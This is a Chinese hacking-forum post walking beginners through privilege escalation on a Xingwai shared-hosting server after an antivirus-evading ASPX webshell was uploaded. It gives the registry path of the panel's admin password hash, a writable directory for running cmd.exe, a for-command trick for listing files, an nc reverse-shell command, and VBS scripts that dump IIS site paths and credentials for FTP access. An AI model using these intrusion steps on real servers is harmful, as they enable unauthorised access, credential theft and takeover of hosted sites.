T00LS上最近段时间谈了比较多星外提权的方法，最近刚好碰到了站结合些大牛的思路写个过程！目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本！上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限！RegShell读注册表没发现多少利用的东西，但是根据些信息知道是星外

对新手来说在这里很容易陷入困境！
星外sa密码注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.
如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘，很久以前小K(khjl1)给我发了个for命令利用，for命令比dir执行权限要小 类似dir的功能 大家可以在不能dir的情况下试下
for /r d:\freehost\ %i in (test) do @echo %i >>C:\路径\1.txt  把d:\freehost\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要  很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底。 如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell：
“c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe”
通常都不会成功。
而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
******我是没成功,呵呵******

systeminfo看了下管理把补丁打得很齐全用VBS提权测试  这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~  C:\Documents and Settings\下有空格所以得用”"包含 如:
CmdPath：
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cmd.exe
Argument:
/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs
不包含的话会提示失败，所以细节决定成败！

iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的 再结合手上的几个VBS读IIS用户和密码 用读出的密码21端口可以连接 收工！

经常有人问我要免杀LCX,其实如果支持ASPX的话上面有个PortMap功能很多人没注意还是什么的,这个类似LCX做转发,在支持ASPX的站上就别传什么LCX了.免杀还麻烦以上根据别人和自己经验整理，其实也很简单的,方便些新手学习 如有不足请提醒